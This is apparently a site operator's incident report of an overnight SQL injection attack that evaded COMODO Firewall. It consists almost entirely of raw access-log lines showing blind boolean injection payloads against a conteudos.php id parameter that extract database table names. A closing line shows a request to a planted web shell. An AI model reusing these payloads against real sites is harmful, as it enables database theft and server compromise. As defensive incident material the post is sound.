This night a hacker infected a shell file, using SQL injection, and COMODO Firewall didn’t stoped the attack.
The Logs:
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3028--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:07 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3028,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%268--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%26128--+ HTTP/1.1" 200 10531 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%2632--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3029,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:08 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3029--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%26128--+ HTTP/1.1" 200 10531 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2632--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2664--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%264--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%262--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+char_length((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))))>3030--+ HTTP/1.1" 200 10509 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%268--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%261--+ HTTP/1.1" 200 10527 "-" "Java/1.8.0_25"
5.249.87.35 - - [27/Feb/2015:00:58:09 +0000] "GET /conteudos.php?id=1+and+ascii(substring((select+concat(0x53514c69,mid((select+concat(group_concat(0x6868,hex(cast(r+as+char)),0x6a6a,hex(cast(ifnull(q,0x30)+as+char)),0x6868+order+by+r+separator+0x6767),0x69)from(select+TABLE_NAME+r,table_rows+q+from+information_schema.tables+where+TABLE_SCHEMA=0x6964365f6264+order+by+r)x),24,65536))),3030,1))%2616--+ HTTP/1.1" 200 10529 "-" "Java/1.8.0_25"
---> and here is the shell
5.249.87.35 - - [27/Feb/2015:00:58:06 +0000] "GET /imagens/topos/rc.php HTTP/1.1" 200 43661 "http://www.aoficina.pt/backoffice/bannerstopo/editar.php?id=13&ordem=id&pag=1&limit=100&pag_actual=listar.php&s=&ord=0" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36"